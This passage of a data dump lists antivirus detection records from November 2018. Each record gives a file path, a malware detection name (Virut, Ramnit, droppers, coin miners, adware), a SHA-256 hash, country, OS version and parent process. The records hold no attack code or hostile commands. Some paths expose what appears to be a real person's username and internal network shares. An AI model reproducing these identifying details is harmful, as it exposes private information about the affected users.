  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='c0215a168a7097f8edb9985ec7394b08b09922deb5c6bf66c04c1c757e0a1fc9', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:36:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='c42f98d0b97da8c63b541af3ebaf9d7f53fc37cef31f2e877676e81b5ee8eb18', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\C42F98D0B97DA8C63B541AF3EBAF9D7F53FC37CEF31F2E877676E81B5EE8EB18', filesize=148000, name='TR/Crypt.XPACK.Gen7.#M300.#R600500'), hash='c42f98d0b97da8c63b541af3ebaf9d7f53fc37cef31f2e877676e81b5ee8eb18', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:05:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274010005.exe', filepath='F:\\scan-peta-wb-sp2010\\3274010\\3274010005\\3274010005.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-125709-5c47d423', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-125519-FE2C94BB\\AVSCAN-20181102-125709-5C47D423', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='9c878d2ac4dc56d03f842506e772da04a2733da13faaf67169f25f205116faf7', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:57:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\iuivjmdpqfg\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-225904-73d1dfdd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b0ac35e0\\AVSCAN-20181102-224831-206A2222\\AVSCAN-20181102-225904-73D1DFDD', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:59:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='feedingfrenzytwo.exe', filepath='f:\\السمكه 2\\0ؤل\\FeedingFrenzyTwo.exe', filesize=1792000, name='W32/Ramnit.C.#M1.#R1'), hash='b48bbcd2819b3c9cb909c85d25e0c7c2ee5a642bd43df21ef6e88dee216b0fe3', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:03:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3274020wb.pif', filepath='F:\\scan-peta-wb-sp2010\\3274020WB\\3274020WB.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='d146370124aef2293ad1d5a50803badc58c645779e423317d330c705ea055319', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T04:04:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\jqhjjf1jorl\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:12:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-134322-166a479a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-134322-166A479A', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:43:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ba1c1ec10f7445b80823c5e7eda2842be32aa364630bc4aa3495259d5b04f012', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:49:35Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-31.categorizing\\EA813CD4129DF283F7AE7BC890FD650FC1D876E20BE0E460ABA3EAC62A93EFC0', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T12:39:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='rcisdrjd.exe', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\fhewwsif\\rcisdrjd.exe', filesize=584000, name='TR/Dropper.VB.d50e31.#M1.#R1'), hash='d50e31534edead41ed9449f6c89feddb29fc729ec79f8275d84501190efc0859', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:00:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='hrl158.tmp', filepath='\\\\?\\D:\\Documents and Settings\\X\\Local Settings\\Temp\\hrl158.tmp', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='c0fc4bfba45ba7de276c1a3e2ba91619b50e4a54a8c4b21c3447e7ec0da95007', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T22:04:29Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='agm.dll', filepath='C:\\PROGRAM FILES\\ADOBE\\ACROBAT 9.0\\Acrobat\\AGM.dll', filesize=5760000, name='W32/Ramnit.CD.#M1.#R1'), hash='cc465ed7f2e62b4ab474979ff5ecd27af4da2969c06384a4db099a2c34e25d9f', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T05:01:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-204449-72168298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3b095aae\\AVSCAN-20181104-175338-16439388\\AVSCAN-20181104-204449-72168298', filesize=172000, name='PUA/MPCCleaner.#M1.#R1'), hash='b0f573ea98c9bf9031b213bccd148d898b39d3a775ada9f2349f0861aecc82c3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T19:44:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='\\\\?\\C:\\Windows\\system32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='ccc1f5845bd9dd99ec37a2f679617712d32e1d4db090546cd37c91cca55624ec', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:18:10Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-190030-547ee398', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_402b68c0\\AVSCAN-20181104-190009-503CD412\\AVSCAN-20181104-190030-547EE398', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='bed5637ba573b79fb13c77cf89b937f3e05cf99c1287e241dea544661e377870', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T17:00:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='jet40sp5_9xnt.exe', filepath='D:\\Scan\\wulan1\\BACKUP\\BMD Street\\hysys 7.3\\aspenONEV7.3dvd1\\aes73\\aspenonev7.3dvd1\\core\\mdac27sp1\\Jet40SP5_9xNT.exe', filesize=2752000, name='W32/Virut.Gen.#M1.#R1'), hash='cda2c430ab5a662b70c25f640f2ad44194a5dfbc9c98580242508f6cec75209c', metadata=Row(cmdline='-service', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Webroot\\WRSA.exe', parentsize=3710592, timestamp='2018-11-04T02:59:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-080341-7a64e54a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_59a51e7e\\AVSCAN-20181104-072801-5B845DE4\\AVSCAN-20181104-080341-7A64E54A', filesize=556000, name='PUA/MPCCleaner.#M1.#R1'), hash='f0507c1b579da388341b7527f761a402b82fd12c078265390a51ddcf1e704edc', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T01:03:42Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='newfolder.exe', filepath='F:\\NewFolder.exe', filesize=0, name='TR/Crypt.XPACK.Gen.#M2.#R2672'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:23:54Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsnBD6A.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\DMR\\Downloads\\152e221a8bef8d2d13c58f995563a1a1\\bdcc004788f23fa84093878d20692eaa\\Fotor3_3.4.1_163.15__win32_x64_official__1_.exe', parentsize=268416568, timestamp='2018-11-04T19:36:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='fa27dc0aa4ce63e95f65ec478f4dc33437b2b25e63e12968539ad6ae053765ad', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-04T14:18:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='fa97aba00f1b5fe70ec5c62dc1c08d559e20d0b64045f375fda312e85c4491d5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T04:09:06Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='\xa0.exe', filepath='H:\\\xa0\\\xa0.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:51:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='TR/Miner.eevge.#M1.#R1'), hash='f6fbbd041481cca2e5e9fd947cd34e0dc066cb16a26cae3b37465c5a59d3403f', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:30:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-220619-7a435251', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6a2e2de0\\AVSCAN-20181101-220557-765D7EF6\\AVSCAN-20181101-220619-7A435251', filesize=512000, name='HEUR/APC.#M1.#R1'), hash='f5e3e92f6562e56435f4a2bc50148cbd58c8d4ffbfb445dbdc2e998975d55abb', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:06:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='network_driver_4fw6k_wn_15.10.0.10_a03.exe', filepath='\\\\?\\E:\\Programs\\Compressed\\all drivers for dell Latitude E6510\\win7 32 & 64bit\\Network_Driver_4FW6K_WN_15.10.0.10_A03.EXE', filesize=130688000, name='TR/Patched.Gen.#M300.#R3374'), hash='f56a8ebc78bfd60f2e56eeafc5e0628888734e2a06538363267370f4af4b2e65', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:04:44Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:38:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='lang.exe', filepath='D:\\DOKUMENKU\\PPATK\\Grips-CTR-Client\\resources\\html\\ckeditor\\lang\\lang.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:28:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-072425-60b2f7bd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-072100-4A04D9B8\\AVSCAN-20181102-072425-60B2F7BD', filesize=140000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='4b5580aadb313330855919e0d15890184dd7437988f14d9a097accf7a25f2707', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T10:24:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0004d296', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp0004d296', filesize=6144000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='34f8121af01718e8f825b72cdc5205f4048ae3f29a6be7bb917d589c2d8a831d', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T05:50:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-153757-d042e25b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_04797e92\\AVSCAN-20181102-153203-A5222964\\AVSCAN-20181102-153757-D042E25B', filesize=1664000, name='TR/ATRAPS.Gen4.#M1.#R1'), hash='05c4a91b676a6f1c6c9d0a9603d1b9a9fa64f8f44098188f92af40e1d9ac751a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:38:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:48:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122336-5e7b4316', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-122316-5A5F3162\\AVSCAN-20181102-122336-5E7B4316', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:23:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mip.exe', filepath='\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\mip.exe', filesize=1216000, name='TR/Patched.Gen.#M300.#R2947'), hash='12d13fd81d7189d4b7b60deb51a90d6f40181f582a2c15ae9ed5d168259496a4', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T12:19:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-21.available\\Avira\\489494DCF2A8596E3D4EC8B6B3F157F9C745394A6F607C6890AB344191AE8261.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='489494dcf2a8596e3d4ec8b6b3f157f9c745394a6f607c6890ab344191ae8261', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T10:42:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T23:26:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pfsmerge.exe', filepath='C:\\Program Files\\DHI\\2009\\bin\\pfsmerge.exe', filesize=384000, name='DR/Delphi.Gen.#M300.#R3883'), hash='106350d96b0849401dbd3c2c0635f2da90fe30d9a37e2ace90d9b919db5a3fc8', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T20:50:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-105008-1b4ffc54', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d235a1c5\\AVSCAN-20181102-104953-18C80AF6\\AVSCAN-20181102-105008-1B4FFC54', filesize=6144000, name='TR/Agent.6144000.#M1.#R1'), hash='242686846d03f68c5c791dad7a01cd02662dfc9a6418c978b6194ad6b812f847', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:50:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8240465493be95e2279ddf91e6abb195.smp', filepath='\\\\192.168.10.10\\SHARED\\_tools\\runtime\\scan\\tmp_489221775\\8240465493be95e2279ddf91e6abb195.smp', filesize=256000, name='TR/PWS.Sinowal.Gen.#M300.#R4824'), hash='5073fd155bbf358ec8be18152d01290177ac70c08369d285d285e023214470be', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\tools\\http_server\\http_server.exe', parentsize=6242816, timestamp='2018-11-02T09:43:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-233632-5dc0d1f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a62e4262\\AVSCAN-20181102-233231-316EF32D\\AVSCAN-20181102-233632-5DC0D1F6', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:36:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='5931493c4c1b03b23fbf74fceab77280aac7a0a483e0fb86c9db29216ba97f1e', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=49664, timestamp='2018-11-02T17:23:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe19_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe19 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T09:51:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnnstubsetup.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\tmp6937173\\MNNStubSetup.exe', filesize=576000, name='HEUR/AGEN.1000022.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:32:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dsp3.exe', filepath='F:\\大戰略 PERFECT 3.0\\DSP3.EXE', filesize=2048000, name='W32/Almanahe.C.#M1.#R1'), hash='6d72a116be57c06d272d643fa65661a8173d7c515d29436351b7a9b331c722ed', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Htg+zIokMUiU6r7A.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T19:01:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-101100-b10d7297', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1cab3c85\\AVSCAN-20181102-101013-A70C872B\\AVSCAN-20181102-101100-B10D7297', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:11:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:47Z'), dt=datetime.date(2018, 11, 2)),
